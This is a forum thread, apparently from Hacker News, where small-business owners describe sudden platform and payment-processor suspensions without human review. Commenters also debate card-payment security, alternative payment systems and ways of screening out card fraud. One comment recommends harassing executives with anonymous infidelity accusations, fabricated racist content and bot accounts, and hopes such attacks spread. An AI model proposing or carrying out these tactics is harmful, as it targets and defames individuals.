It's a constant fear, and there's no way to avoid using these companies. I'm currently dealing with a bakery business that was suddenly suspended from Google Maps. This is a big deal because it's the main way, by far, that people find us.
7 days ago, boom. Your account has been suspended for not following the business guidelines. The only thing I've updated recently was our hours. It's been listed without problems for about two years.
Of course they don't tell you what the issue is. They just tell you to fix it and then beg them to reinstate you. It takes up to two weeks apparently (7 days so far). And if they decide not to, the only thing you can do is delete the listing, and two years worth of hard earned reviews go up in smoke.
A few days ago one of our staff told me a Korean tourist came in the day before we were suspended and accused us of being fake. I don't know exactly what happened but due to the tourist's limited English nobody could persuade them we were the real location. Or maybe they were looking for somewhere else entirely? Who knows. Apparently they left a negative review, which I can't see while the account is suspended. Probably they reported the location as fake.
So that's it. Two years, over 100 positive reviews sitting at 4.9 stars. Gone because of one confused tourist. Or maybe because I updated the hours. Or maybe an automatic spam check didn't like us.
I sincerely hope that the next round of EU laws tackles this instead of privacy. It's just as big an issue, especially if you're running a small business.
My wife's floristry business has been blocked from being able to access facebook advertising and permanently restricted in how she is able to interact with her customers in part because a bot flagged and suspended her for trading in trading exotic animals. The exotic animal she was accused of trading? Aphelandra Squarrosa - The zebra leaf plant.
There's no way of getting this ban reversed, there's no way of invoking any human to perform a manual review on the ban. It is a permanent restriction that impacts her ability to communicate with her customer base.
> There's no way of getting this ban reversed, there's no way of invoking any human to perform a manual review on the ban. It is a permanent restriction that impacts her ability to communicate with her customer base.
You know you're doing it wrong when the the Ministry of Information in the movie Brazil has better customer service than you do.
Getting lawyers involved is one guaranteed way to talk to a human at Facebook. It won't be easy or cheap though, so I can understand why a business like a flower shop wouldn't want to do that.
if you're based in Europe, try framing it as a GDPR issue. Article 16 says that data processors have to rectify data that is inaccurate or incomplete within 1 month. If they don't do that, you can raise it to your national privacy ombudsman as an incident. This being Facebook, there is a chance that they'll act on it.
Be sure to CC privacy@facebook.com and legal@facebook.com
Only issue: not sure that the GDPR applies to companies. And it's a 'pro' account I guess?
Sorry to hear this. Floristry is pretty cut throat with all the shipped direct sites that undercut prices. (Used to work at FTD.com, which bought ProFlowers, a very large flowers-in-a box operation.}
> I sincerely hope that the next round of EU laws tackles this instead of privacy. It's just as big an issue, especially if you're running a small business.
This! Couldn't agree more. I believe this is a much more bigger, huge problem compared to privacy, which is preventable (users can choose not to use a service) but this can take down entire businesses because of data giants' crappy/false alerting systems.
It should be illegal for Google, say, to remove listing without proving, or if that's not possible, if they remove they should legally be forced to compensate for the damage done. (Of course Google is just an example here, applies to any large enough platform)
By that logic you can just not use Google. But that's ridiculous, as ridiculous as the statement that users can choose not to use a service. I believe it's impossible to live in modern society without having an account in FAANG, even harder than a business not having a google maps listing.
Given that Google handles a tremendous amount of email (not all to gmail.com domains either), and that other companies maintain "shadow profiles" of non-members, or simply track vast numbers of people (credit bureaux and other data-brokers), let alone the vast levels of surveillance baked into the present-day Internet, saying people can simply opt out of services is ... profoundly untrue.
There's not need to pit fairness in business dealings against privacy. Both are wins for the average person.
I really am I favor of your suggestion. Next to that my stance is that big companies should be by law be required to have a human representative you can contact, especially in the time of AI.
> I sincerely hope that the next round of EU laws tackles this instead of privacy. It's just as big an issue, especially if you're running a small business.
At least in Germany, you can file for a court order ("Einstweilige Verfügung") against Google - that usually works out and is relatively cheap, a couple hundred euros. Consult a lawyer, I think most EU countries have a similar instrument. Do note, you might have to file for an order both against the Google Europe HQ in Dublin/Ireland and against your country's Google office.
How would this work? Google isn't an official registry, do they have an obligation to list any business?
And the privacy argument is often effectively countered with security concerns, even more so if that is expressly stated so in the ToS.
Just to be clear: I'm 100% on the GP's side, I'm just curious what the Verfügung could do here. In order for the court issue such an order, it needs at least a reasonable legal basis.
Even if you dont want to be listed on google maps, they will sometimes generate a fake listing for you anyhow. I got burned by one of these as a customer, the link for takeout was not actually a site the restaurant was partnered with. I’ve also seen restaurants with similar names url squat these other places.
It seems so bizzare google will publish such information without ever validating it with the business. It must cause a lot of damage and support quite the environment of scammers though.
This happened to a restaurant I go to a lot. Their Maps listing said there was online ordering, but the link went to a site that even had a disclaimer saying they were not actually affiliated with the restaurant. I reported it to Google and they removed the entry, but anyone can make a change and double checking seems to be cursory at best.
On the flip side, as an avid Google Maps reviewer they also removed my negative review from a restaurant without any good reason (supposedly the business reported it as being “fake” or something)
It really pissed me off because I wrote a long thoughtful review and mentioned the good aspects of the restaurant too as well as some recommendations, and it’s just completely gone
The worst part is the restaurant is sitting at 4.5 stars despite being quite bad, and the recent low star reviews are all questioning the rating, which is obviously artificial
I've been reading a lot of reports recently about how businesses abuse AirBnb and Google Maps reviews by forcing the companies to remove them on technicalities or by outright lies. I wonder if I should just post any less-than-stellar reviews without any text but with rating only in order to make it harder for them to remove. Thoughts?
This is also a problem on the customer side. I don’t shy away from leaving bad reviews to businesses that deserve it. These businesses either reply with a passive aggressive doxx like “Hi Or Nornor” when I don’t use my real name anywhere on the internets (including medical-related businesses), or they report the review and my account gets blocked with all my reviews removed.
And then of course there is it a single living human at google you can contact to even find out which review was flagged, why, and what to do about it.
I don’t even read reviews anywhere anymore, they’re all faked or AstroTurfed anyway that they give no indication of anything. What a brave new world.
I encountered the same problem recently. My family member’s business changed location. Updating the Google maps listing caused Google to flag it for not following guidelines and weeks passed with the listing being “under review”.
The solution that ended up working for me was to start paying a few dollars a day for Adwords. For some reason that cleared the issue up the next day. Then, I turned AdWords down to a few bucks a week and then later off entirely.
> The solution that ended up working for me was to start paying a few dollars a day for Adwords. For some reason that cleared the issue up the next day.
Yes, for some reason it cleared up after spending money. I really hope it’s not the norm. Sounds like extortion to me.
Can confirm. This works in more places than one, Reddit too. Reason? When you're a paying customer, you get routed to elevated support staff. They have a higher incentive to help you fix the problem and fast.
I don't hate it, I appreciate it. Better than having no easy recourse. Because I bet if everyone were treated equally, it'd be shitty service for all. Better to toss in a few bucks if it's valuable and get the support (and some ads run).
This sounds like an Mafia movie. Pay up for a little protection and don't let it happen again!
Intentionally or accidentally, it's a great problem for big tech to have. You scramble with everybody else to be on the service and the DDOS crowd, confused tourists and local ruffians take your account offline. Better grovel up to reinstate your honour and pay for protection/added services/more identity validation that doesn't stop the problem from happening. Same thing every big country does, we are all under a "security umbrella".
Honestly, real life advertising needs to make a come back. And localized knowledge of the businesses worth keeping alive, when Google's security algorithm dumps them without administration even knowing it. Eggs all in one basket, was never a good idea.. right?
Also, how should a small business deal with fake negative reviews in, say, Play Store? Google does nothing to fix that. As the app developer you know a review from an account that didn't sign-up to your service is fake, especially when it appears at the same time other similar fake reviews do.
If you happen to review few places on Google Map you are holding superpowers. Idk if that works for new accounts too. But yeah, at least if you do some activity then you report a place as closed, they are "checking" it for 1h, then you get the e-mail that the place got removed from Maps.
I use that for good purpose - I fix a lot of invalid information on Google Maps around my home town, and they apply the changes without batting an eye. This is good for society. But I can clearly see how that could be used for abusive purposes.
I feel like you should be able to request a call from their call center rather then be forced to wait on the phone for one. The long wait times to speak to representatives is a cost savings measure.
First saving on having to hire an appropriate level of customer service staff. Second that percentage of people who give up.
It's a feature, not a bug.
I think one of the pixel phone had an option to detect when there was a human on the other end of the line. Definitely made me consider getting it back when I was looking for a new phone.
Well because there's already been a lot of laws passed in that regard and there's already momentum. I don't mean they should stop this momentum, these privacy laws are incredibly important.
Because privacy laws have zero teeth and workarounds are technically easy (or endlessly annoying for zero new outcome, e.g. see cookie popups). If the EU would actually enforce GDPR it would be amazing.
Meanwhile these companies who have essentially became a public utility don’t provide customer support or explanations.
you get bad service from these companies for the same reason the government generally provides bad service, they are monopolies with no reason to spend more money to improve
I worry about the horrible side effects that would occur from trying to grant that wish. It is always easy to make demands when you aren't the one carrying them out and most people don't think the implications through.
My mind just boggles at the implicit additional bureaucracy, expenses, and slowdowns being cheered for. The kind of mess which results in a system so complex that it has its own "degrees which shouldn't exist" spawned from it like medical billing.
You can blame the evil competitor but the real problem is that credit cards are not the right tool for payments to strangers over the internet.
Every time I do a CC transaction I’m giving a stranger exactly the information they need to do an entirely different, arbitrarily large CC transaction in my name with any merchant. That’s bonkers.
I’ve recently seen more use of Apple Pay via websites. Assuming it works as Apple Pay usually does, this at least is technically more secure (though I don’t like giving Apple more power) since it’s basically an exchange of cryptographically secure/verifiable one time tokens.
PayPal is no one’s favorite but at least if you use that you’re not handing over your CC number. (And yet they seem to lock out tons of merchants, hmm)
Why are we still using credit cards? It’s not great as a consumer either - I have had my card locked for traveling within the same city and spending maybe $20 at a merchant I don’t usually visit. I had it locked because of a $5 web service monthly charge - and I had verified the same charge the two prior months.
> Every time I do a CC transaction I’m giving a stranger exactly the information they need to do an entirely different, arbitrarily large CC transaction in my name with any merchant. That’s bonkers.
You may be surprised to know that, when doing a "conventional" CC transaction, you are most certainly not giving any stranger information that would allow them to perform a transaction in your name on another merchant. What you are doing is providing your card information to a PSP (payment service provider) that has been contracted by the merchant and will provide the merchant with a token with which the merchant can trigger a charge request to your card but only to their own pre-approved acquirer account. The merchant can do nothing else with these tokens.
A breach of the merchant's token database would be embarrassing but harmless. A breach of the PSP's database of card numbers would be bad and inconvenient for the cardholders, sure, but it would be a business-terminating event for the PSP as its PCI DSS [0] compliance would be shattered and it would be unable to operate again.
In summary, ordinary card payments are essentially as secure as Apple Pay. The only difference is that in one case you are trusting a gigatech brand which is very saliently involved in the process but whose side-business in payments has only operated since 2014, while in the other case you are trusting businesses that you may or may not have ever heard of —Adyen? Braintree? WePay? Worldline?— but that have probably been dealing with secure payment processing as their primary or only business for much longer.
I think you missed the “over the internet” part. When you do a CC transaction over the internet, you give the merchant your CC number and all the other information needed to make a transaction happen. A legitimate merchant may pass that information directly to a PSP, but you can’t deny you’ve given the merchant the information. Surely you’ve filled out a CC form in a website before?
What prevents me from cloning some product's website and changing the payment form to send me the details instead, which I then submit somewhere else to purchase something online for myself? Not sure why Stripe or PCI is even important here.
(IMO) what GP was arguing for is that we should have a fundamentally asymmetrical form of payment, viz. the information I give for one purchase should not be able to be reused for another purchase, like a one-time token. Imagine if you had to send your private key every time you wanted to purchase something in crypto, for example.
This is correct and the GP is (confidently) talking nonsense.
However the big issue is most normal users would not have the ability to see if they're using an embedded iframe or cross origin JS from Stripe, Braintree, etc.
> You may be surprised to know that, when doing a "conventional" CC transaction, you are most certainly not giving any stranger information that would allow them to perform a transaction in your name on another merchant.
No. In best case, you’re giving your payment details to a PSP. A couple years ago NewEgg had a javascript skimmer on their checkout page that harvested all their customers payment details for months. Obviously anyone with access and intent could do the same for any payment page.
> I have had my card locked for traveling within the same city and spending maybe $20 at a merchant I don’t usually visit. I had it locked because of a $5 web service monthly charge - and I had verified the same charge the two prior months.
This happens to me almost every time Skype bills me, and I've been a customer for probably 10+ years with both my bank and Skype, and the billing is regular as clockwork. For at least of half of that time, I've complained about it vocally and customer service can't do anything. Now I think about this every single time I hear "AI-assisted fraud detection", and by extension, "AI-assisted security" and really "AI-assisted XYZ". Without another credit card, I guess I'd simply live in constant fear of being embarrassingly declined totally at random on any/every transaction. It's not like I* know the billing cadence, even though my bank has a decade of history.
Clearly they are simply selling my history to the highest bidder, because they certainly aren't using it to help me. On a related note, ever notice that vanilla "exact substring match" search even in gmail is just as bad as google web search? All these corporations that are allegedly indexing us to "value-add" with some perfect high-resolution consumer model can't even do basic shit despite all the spying. I almost expect* my privacy to be fucked, like I guess hey that's modernity. What never ceases to surprise me lately is how the pretense has kind of dropped and we get nothing in exchange, even petty conveniences.
> This happens to me almost every time Skype bills me, and I've been a customer for probably 10+ years with both my bank and Skype
Why are you still with that bank? Even if you like everything else about them, couldn't you just open an account with another bank for Skype billing? Having more than one account is helpful anyway for avoiding having a single point of failure where you can't buy anything.
Unfortunately we didn't use the contactless change to finally fix this. NFC payments are still stuck in the world where the client doesn't have a way to make the payment themselves so has to trust the payment terminal the merchant puts in front of him with their secret information. The transaction should have been reversed. The merchant should have the dumb side, where they only communicate payment details, and the client's phone should be the one doing verifications and initiating the payment. It's bonkers that this hasn't become standard yet. Even more bonkers that internet payments didn't make the same switch long ago.
at least in this respect the now prevalent UPI (unified payments interface) used throughout India fares better.
each merchant -- even a roadside vendor or a mobile hawker of wares -- displays a QR code that has their payment account details / UPI handle.
Customer uses their own phone and UPI payment app to scan that QR code, look at the merchant details displayed, punch in the amount to pay and authorize the payment using their PIN.
(a variation on this is: hand-held POS terminals display a QR code that also encodes the amount to be paid so that the customer doesn't have to punch in the exact amount).
and since this is a unified protocol the users are not stuck with a single payment app or a single payments processor or a single bank network to transact with each other. QR codes are universal - can be scanned by any UPI app.
I have other reservations about the digital trail this leaves for every petty transaction of your life -- and the small risk of a petty vendor being able to harass you later based on the information you leave in their records.
If we don't trust the government -- this makes us jittery about how much they can track you or even cripple your life by disabling a few key things that you need this all to work smoothly.
Those risks aside,this UPI system has been a boon to ease of transactions (without worrying about handling cash and change) across the country. Net positive with some scope for improving privacy protections.
That would have been nice, but not backwards compatible with millions of POS terminals and payment processing setups out there.
One big advantage of contactless card payments as implemented in most countries is that you can seamlessly introduce it, making it look like a regular chip or even magnetic stripe transaction to the POS and everything behind it.
EMV is in a substantially better position than online credit card payments: the terminal cannot clone a card (though it sees a PIN and card number, it does not see the CVV, so it is not useful for online transactions, and the card contains private keys which are relatively hard to extract. The only remaining hole is creating a magstripe card, but these are becoming rare even in the US). The card does see and verify the transaction. The two main issues are the PIN entry onto the pad (which exposes some information, though with NFC this hole is somewhat removed), and the fact that the payment is still initiated by the terminal, with no way for the user to independently see the transaction amount before authorising the transaction (NFC on a phone can in principle fix this, though in a somewhat annoying manner: it could refuse the transaction the first time, then prompt the user, and accept the next transaction for the same amount).
This is how it works in a lot of places, including everywhere in China and parts of south east Asia. The merchant’s device displays a QR code, which you scan with your phone. The details of the transaction are shown on your screen, and you can select things like where the money should come from, sometimes discounts etc, and then tap to complete the transaction.
> You can blame the evil competitor but the real problem is that credit cards are not the right tool for payments to strangers over the internet.
Granted the entire system needs a revamp, but credit cards are one of the best tools we have to pay strangers right now. Credit card money isn’t your money being spent, and comes with a fraud guarantee. I would rather use a credit card than something linked to my money in a checking account for sketchy transactions.
Yes, it’s a hassle when the card number inevitably gets stolen, but NFC payments, etc are starting to tackle this.
One thing I’ve seen a lot is people misunderstanding credit cards. If you pay them off monthly, you usually get some kind of reward and additionally a huge layer of fraud protection from your personal finances. That being said, I also can’t wait until more secure credit card systems become more prevalent.
In much of the world, the "credit card" payment goes through a pre-paid card. Then you're actually putting your own money on the line, and even if there's a guarantee, it's a pain to actually go through the process of invoking it.
If this is one of the best tools, then I'm really dismayed at the state of payments around the world. SEPA bank transfers are so much better, even if they have other problems.
My cc number is useless without access to my bank account. The hacker would also need to steal my phone and bypass the fingerprint scanner somehow to get in there.
>One thing I’ve seen a lot is people misunderstanding credit cards.
Practically all the credit card haters turn out to not understand credit cards, it's almost hilarious. Are people not taught even the very basic of financial know-how from anyone?
> Why are we still using credit cards? It’s not great as a consumer either
Because the big networks (Mastercard and Visa) as well as the issuer and acquirer banks spend insane amounts of money on advertising and lobbying - even in the EU where payment fees are capped, the cap on CC fees is notably higher than on debit card/SEPA fees, so there is a clear incentive for everyone in the chain to push for credit cards.
Additionally, issuer banks make a ton of money on interest which means they have even more of an incentive to push for CC usage.
And also this reliance on a few payment providers causes the same type of problems as this business have with Google - big businesses trampling yours on a whim, with no real recourse. The problem is actually far worse with payment processors, who are increasingly taking it upon themselves to be an unelected worldwide morality police, deciding which types of commerce shall be legal with their own de facto law
Is it? My bank accounts in two European countries have in the last year transitioned from Visa Credit Cards to Vise Debit cards. Because the banks in both cases wanted about 2.5 euro per month for something that does not provide any value to me. Unfortunately Visa Secure seems to be changing its validation mechanism every 3 months though, which each time is super annoying.
This is not mandatory by law though and mostly it's up to merchant to decide whatever they require 2FA or not. AFAIK payment processors like Stripe actually let you make 3DS (and whatever it called for MasterCard / AMEX) mandatory.
I guess problem is that in US you'll lose a lot of customers by declining payments without 2FA. Also likes of AMEX use 2FA via email so I guess there could be fraud too.
We’re still using credit cards because they severely limit personal liability. Many CC companies give you the ability to have temporary cards with short term expiration linked to your account. However, there is minimal incentives for you to do so.
The credit card company and indirectly the vendors carry much off the cost of fraud. The credit card company spends a lot of resources on preventing this fraud. Introducing a proper solution for online payments would allow them to reduce costs and offer better deals to vendors and consumers. They also are the only participant in this who is a individual participant rather than a group. It seems like this is the ideal setup for credit card companies to introduce innovative solutions. They have the incentive and the leverage, yet it's not happening. What am I missing?
Strong authentication/payment confirmation and strong consumer liability protection are not mutually exclusive.
In the EU, card issuers and merchants are required to use 3DS for e-commerce payments and PIN verification for in-person payments in many circumstances; yet chargebacks are still possible.
We use CC because the infrastructure is there and there is legally mandated (depending on jurisdiction) fraud protection.
When you pay with CC, the issuer is potentially on the hook for fraudulent payments, so they are incentivized to provide the protections.
And of course there are many that use CCs for the purpose of a loan to purchase items they can’t currently afford.
Although you're right that Apple Pay is cryptographically verified, you may be surprised to know these two things:
1. you can charge any amount - the amount shown in the Apple Pay UI is arbitrary
2. you can make multiple charges, also of any amount (e.g. for a subscription)
It is tokenized, but practically it's just a card number you can charge like any other card number. It's also typically linked back to the original PAN, so multiple payments can be correlated together with ease
Your payment processor and the network has to trust you if you're reusing the Apple Pay cryptogram for a subscription payment. You _can_ do anything (e.g. you can represent yourself as an open loop transit network reader and get a card number without any authentication from express mode cards!), but the network will not allow you to succeed doing that for very long, if at all.
A multi-cryptocurrency payment system would be the perfect solution for online payments but unfortunately nobody has figured out how to solve the double-bullet problem which stands in the way of mass adoption.
No, it's really not. As a buyer I don't want irreversible transactions to someone anywhere in the world, I want something that if the seller isn't acting fairly (items not as described, not shopping orders, etc) I can lean on to get my money back.
I hate 3D secure, it's a way for banks to move the liability and inconvenience to me, their customers. In most implementation, I need to wait for an sms, often that sms takes ages to come.
Then there's a bit of a monopoly with 3d secure implementation by cardinal.js and their solution falls down completely if you have a decent amount of traffic on the site (I have worked on flash sales websites, cardinal js is about as reliable as I can throw my car)
No information given about the actual activities ongoing here so I’ll focus on the service providers behaviour directly.
Given the meteoric rise of companies charging for services with no support of any type available for consumers other than hoping for traction on social media, how do we legislate to basically enforce some alternative to ‘computer says no, just make a new account and hope it doesnt happen again’. This seems like something consumer protections agencies should be all over.
Australia’s consumer protection body is actually quite active in enforcing our rights when dealing with these sorts of things. Does America not have a similar agency or has it been captured by the companies it’s supposed to regulate?
These companies are collecting sizeable profits and part of the way they’re achieving this is by simply disregarding all the support and engagement processes ‘normal’ businesses have to have claiming their scale makes them impossible. That should just not be an acceptable answer as far as consumer remedies are concerned.
Payment processors are a natural monopoly and as such they should be regulated like utilities, i.e. not allowed to deny service without good reason. Unfortunately the government rather likes having a way to destroy the livelihoods of undesirables without any of that pesky due process.
The payment networks (Visa/MC/etc.) may be monopolies but there are ton of processors (Stripe/Paypal/etc.). Sure, all the smaller processors "suck" but somehow they worked before Stripe was founded.
We need some new snappy word to describe what service providers are doing.
I know you could probably say that its just some other existing legal construct which we should just enforce, but the point is that the media needs some snappy new very specific word to talk about to make politicians pay attention.
Things like swatting, phishing, slamming, gaslighting and boofing we all know about and are easy to write articles on with decent enough SEO.
So what is the snappy new 21st century term for this, so that we can complain about it and write blogs and articles about it and demand politicians do something about it?
Every business wishes it could be a vending machine. Strip out all employees and customer service and damn the consequences if your soda gets stuck.
Too many people and businesses have been relying on these vending machines, partially because they have no other choice. Everything has been hollowed out, every store runs on a skeleton crew. You know this if you’ve walked around a store wondering if anyone even works there. I never noticed this until I traveled to other countries and found businesses that actually felt like they wanted to please me instead of feeling like I was expected to be grateful that BigBoxStore (tm) exists.
"Deaf corporations" since they cannot hear, "Divine corporations" since they won't listen to you, "Nosumers" as the opposite of prosumers and a nice play with no-sum (you heard it first here)
It does, but it's still newish, and faces a lot of opposition from both politicians and businesses.
In 20 or 30 years, once the various lawsuits and codes get sorted out, it might work. But it's still in its toddler phase, and everyone is seeing if they can push the baby over.
The Federal Trade Commission seems relevant. I've not tested them on these "no support; no recourse" situations, but have had good results for other issues.
Anybody thinking of the "Better Business Bureau" should note that the BBB is not a government organisation and behaves more like a Better Extortion Bureau: paying members can keep their good rating by unilaterally declaring a claim has been resolved (often requiring claims to be reasserted multiple times), while non-members or non-paying members cannot even contest claims via the bureau.
We also have an issue of enforcement, I'm not sure if you know... but many, if not all of these behaviors could be acted on with existing legislation. Anti-trust at the federal level and a multitude of state laws on paper make it illegal to do this type of behavior.
The problem is that it's really hard to take action on large corporations. As a consumer, if I wanted to seek remedy for say, false advertising of ingress protection on a phone, it would cost hundreds of thousands of dollars in legal fees. Without a significant war chest it's almost impossible to hold most companies to account as an individual, and the agencies supposed to be enforcing these issues either won't or can't enforce the laws on the books.
The Aussie government has the same new account cycling that corporate culture does. It's just that the gov has call centres and support staff.
Do you think there's any incentive to fix these problems when the constant inconvenience and technical gremlins can be more easily and excitingly solved with biometric IDs and whatever else?
Let's be honest, the Australian government may clamp down on corporations, but it plays the same game and doesn't care for anyone's dissent in the long run.
Not sure if anyone has experimented with this but I wonder if there is a solution but it's just relatively unused. I've heard suing the company (or in most cases, taking them to arbitration) works and often times the company is the one paying for the fees (because that's how arbitration works).
The claim that scale makes support impossible is ridiculous. Just make support a paid service and it'll easily pay for itself and scale proportionally. The will is simply not there
If you are being unethical there are a bunch of things you can do.
I would advise targeting people directly, anonymous letters directed to a spouse with accusations of cheating will help prevent executives from travelling and add a lot of personal stress on their lives, all it costs is a stamp. -- this is especially easy if you live in Sweden; since addresses and living arrangements are public info.
Other things you can do is to fabricate something racist and pay for a few hundred bot accounts to follow any mention of the company or product.
I have had both of these happen to me, and my industry is not very competitive nor am I a famous figure.
I hope this attack becomes more popular. I truly do.
Maybe these attacks will finally force regulators to do something about the financial parasites we call "payment processors". Any payment processing system that doesn't act like a public utility is broken and needs fixing.
I think the only digital payment system that comes close to acting like a utility right now is cryptocurrecny which is a sad, sad state of affairs.
OP: While not a complete solution, you might be able to partially mitigate this by allowing customers to pay you in other forms (e.g aforementioned cryptocurrency, bank transfers). That's what the porn industry and other legal businesses end up doing when they inevitably find themselves in your position.
If your customers want your product badly enough, a small fraction of them will learn how to use these payment methods. You'll have to learn to survive on those alone.
Pix, the Brazilian payment system, is basically a utility, and payers authorize the payment rather than the payee. It has very little friction, everyone uses it. It does require working internet.
I feel that Algorand (I'm not a holder anymore) was positioned to work as such but would require all the parts to make it successful. The 0.001 ALGO transaction fee cuts down on silly transactions while making 0.1 ALGO transactions possible. It also allows trading in stablecoins or CBDCs as they are enabled. It can complete transactions in milliseconds and moderately-sized participants can easily help maintain the whole network. It never gained traction, however, probably because it isn't a good HODL.
Why is it sad? I truly don’t get it, people on HN will say they are somewhat libertarian, pro decentralization, anti corporate oligopolies, but then use their dying breath to say “crypto has no use case”. Yet while AI took nearly 70 years to find its footing, in just 10 years crypto (currencies) has already found inroads into many areas as a nascent technology that has massive potential to solve some of our biggest problems.
I truly think it’s one of those cases where the “wrong/dumb” people jumped onto it (alongside scammers) and so it became poisoned to the right/smart ones. But we should be way better than that! Is it really so hard for people to separate good from bad?
It absolutely bowls me over to see this lack of ability to discuss it carefully around here so consistently. So many potential amazing conversations totally shunted by the absolute need to turn it tribal.
> Is it really so hard for people to separate good from bad?
If you mean "HN people", then probably no; but if you mean more generalized "people", then definitely yes. Unfortunately, your customers are much more likely from the latter group.
Also, being in a sad state doesn't really mean it "has no use case", right?
As someone who worked in France for a medium-ish size media agency, we had something similar happening to our google adwords account... and it took ~2 weeks for our legal studio to get it back with direct support from google.
Afaik it mostly took them to basically write a few legal letters and telling them "our legal representatives would be glad to meet you at your offices at Google France and discuss such unfortunate issue and so and so" - they basically went "how about no" and restored the account.
Laywer fees weren't particularly cheap (in the range of 2500-5000€) but still well below the money we were losing.
Is this not an option for US-based businesses? I have heard similar horror stories like the one on the OP a few times already but I've rarely seen them pursue a similar path.
It is absolutely an option. Some people simply choose not to pursue it for many reasons ranging from financial, to a matter of principal, effort required, or any other number of reasons.
> 10 year relationship with Paypal and 7 year relationship with stripe
Not that the author is implying this, but don’t ever make the mistake of thinking that these numbers ever matter. It’s not 1973 and you don’t shake hands with your banker.
The only number that matters is the number of dollars going through Stripe or PayPal because of your business.
Been there. It might be competitors. It might just be fraudsters looking to see what they can get for free from that otherwise useless stash of credit card numbers they stole or got on some forum from someone who did. Once your marketing hits the radar of one of these crews they will pass your service on to each other. As a merchant you need to develop your own fraud screening techniques or pay someone to do it.
(Pardon me if I am projecting from my past startup experience to yours in all my comments.)
I am not blaming the victim. But the industry is setup so the merchant is most responsible for detecting and dealing with fraud. And that is probably objectively not a bad call. You have all kinds of ways to detect who is doing this and ways to stop this. I hate this crime with a passion and cut it down from 5000/mo to 50/month at my first startup when it blew up on us. But it is true the credit card middlemen, having externalities the risk to you, don’t then innovate incremental tools for merchants that well. I was frustrated when I received fraudulent requests there was no third party I could report my suspicions of fraud to with a confidence rating (or check against other merchants suspicions). I did many years later see a service like that but now can’t find it.
Good luck. These guys are persistent. In my case most of them were coming from poor countries where a dollar of fraud is worth a lot more of their time than yours. Until you stop them cold, they will keep coming.
No OP, but I had it happen to me and adding a "3DS" card verification to the checkout flow made the problem go away. The 3DS step is where they text the customer a number they have to type in to proceed.
It's a pain for the customer so I only do it on newish accounts, repeat customers don't get bothered.
This was LONG ago so some context is less relevant now and may not apply to others, but three of a dozen of our tactics turned the tide, the last being the best, but building on the others:
1) The basics: track all information entered in the signup process and display it in a signup email to our customer service/onboarding rep, along with whether and how often each piece of info was used (or was similar) in past locked/disabled-for-fraud accounts and have a human determine via eyeball if the composite picture looked like fraud. You’ll be surprised how often a customer saying his name was Ibrahim with a phone number in Egypt had a IP in Jordan and was using a credit card belonging to Sally Jones with a zip code in Kansas. Don’t automate fraud decision. Have a human in the loop. Know your customers with a human touch up front at signup. (“Do things that don’t scale” is the more recent mantra for this approach.) But never emit info so fraudsters couldn’t game the system beyond the binary of getting enabled/disabled, and even then don’t give them immediate feedback during/post signup to run permutations quickly. Have a human vet asychronously shortly post-signup as part of customer welcome/orientation call.
2) Silently partially disable international customers so they could sign up and give us info and do certain things but not really generate expensive transactions until a customer rep called and welcomed/vetted them and checked a box unrestricting them in our admin panel. (I say silently but if they actually got to the final step of a transaction, we did give them ways to reach out to us to get activated after talking to someone (which was manned 24x7). 99+% of the time, fraudsters never called/reached out.)
3) Most subtly, reps especially offshore ones from white label partners of ours were slow to use our ways to vet their (and thus our) customers even though their management was pushing our development team for more and more technical solutions to cut fraud. It was frustrating because I could see the fraud and it was a massive chunk of our partner’s revenue (1/3rd?) shortly out of the gate with us, but since they were a white label customer of ours I/we couldn’t exactly tell their lower level rep employees to get off their butts and take the fraud seriously (when even their management wasn’t getting through), nor did I want it to continue to harm their business because it would also harm ours.
Remembering the mantra “you can’t manage what you don’t measure”, I built an admin screen that their reps (and thus their bosses) could see that showed when each recent customer signed up and when they were cleared or locked out as fraud, how many minutes were between the two and who (which rep) locked/cleared the customer and how much was spent (lost) before the account was locked. The difference was profound. Fraud from the white label partner’s customers dropped practically overnight, from $5000 a month to under $50 just by adding a report that quietly made the humans in the loop accountable. I didn’t even have to tell the partner’s people what to do. I just made the outcomes measurable and visible and the problem took care of itself. It was a profound lesson for me early in my career. I wish that exact trick had been more useful for me since, but still — very eye opening. Chargebacks were never a problem for us again.
I’ve heard that a lot of Shopify sites will have the auto credit card processing disabled for new orders. So that a real person can validate the order before hitting Stripe or whoever with it. Fraud orders are usually easy to spot by shipping addresses and you can get a good sense for it pretty quickly. It isn’t quite chicken sexing!
Maybe the hot take here is that the best way to ruin your own business is to automate credit cards?
"Fraud orders are usually easy to spot by shipping addresses"
You can find some of these by searching the shipping address and seeing if it's a freight forwarder or an obviously vacant home (listed on MLS with empty room pictures). Those kinds of shipping addresses have a pretty high fraud rates.
But, if you mean seeing that the shipping address doesn't match the billing address on the card via AVS... That's trickier, especially for B2B spaces where a business owner buys with a credit card tied to their home address, but ships to their business.
Here’s a question, if Stripe or PayPal for example are processing so many transactions why can’t they see this stuff coming a mile away?
Shouldn’t it be trivial to “triangulate” the origin of a card hack / leak after like, I don’t know, three or four transactions? This whole thing seems rigged to put make small businesses liable for covering the cost of the PII failure of probably a banking institution, or a minimum a completely different small business!
Reading so many of the comments in this thread just strengthens my belief that we need large platforms to be governed like utilities, or even better, open source alternative based utilities
I know it's probably downvoted as society has sweet spot for pity, but to certain extend it's OP's fault.
As a merchant, you need to do proper anti-fraud system. Especially considering influx of orders with stolen CC. It's just necessary to avoid huge financial and reputational losses.
Don't rely on Shopify/Stripe "anti-fraud" - it's absolute garbage selling feeling of security. Proper analysis of order flow with spotting irregularities across many datapoints are needed.
Some may whine things are not fair - yes they are not, and never will be. You just need to adapt.
Let me guess, you think cloudflare is the devil, right?
This is happening because you are basically leaving your PoS system open and unattended while a scammer walks by with a wheelbarrow full of freshly stolen credit cards.
Throw a captcha on that checkout page at least for goodness sakes
Sidenote, I remember some people here wondering why websites don't explain why a transaction failed (wrong CVV, wrong AVS or Do not honor, etc...). This is what happens if you do give this kind of error through, don't put some form of rate limiting, etc.. It becomes a convenient site for scammers to test stolen credit cards and you end up being flagged by your payment provider.
Also, it's worth having a relationship with a smaller payment gateway, merchant account provider. It insulates you somewhat.
I unable to log in to my paypal account, because the confirmation sms never arrives, and the only contact given is to call them. Guess I’ll never use paypal again.
I just wish there was adversarial integration on these payment apps. I'm tired of setting up new ones.
Imagine if our phones still worked liked they originally did, where you could only call other people using the carrier you are. Oh you have T-mobile? Sorry. I have AT&T, i will write you a letter.
We didn't put up with it back then, and we shouldn't put up with it now.
I’m not a crypto evangelist by any means but one thing that I like about crypto is there are no charge backs. I added coinbase and it’s not a huge amount but about 5% of sales go over this. Apple/meta/amazon pay are also some what alternatives because the payment is going through a device that can be physically stolen but harder to do fraud than a virtual credit card.
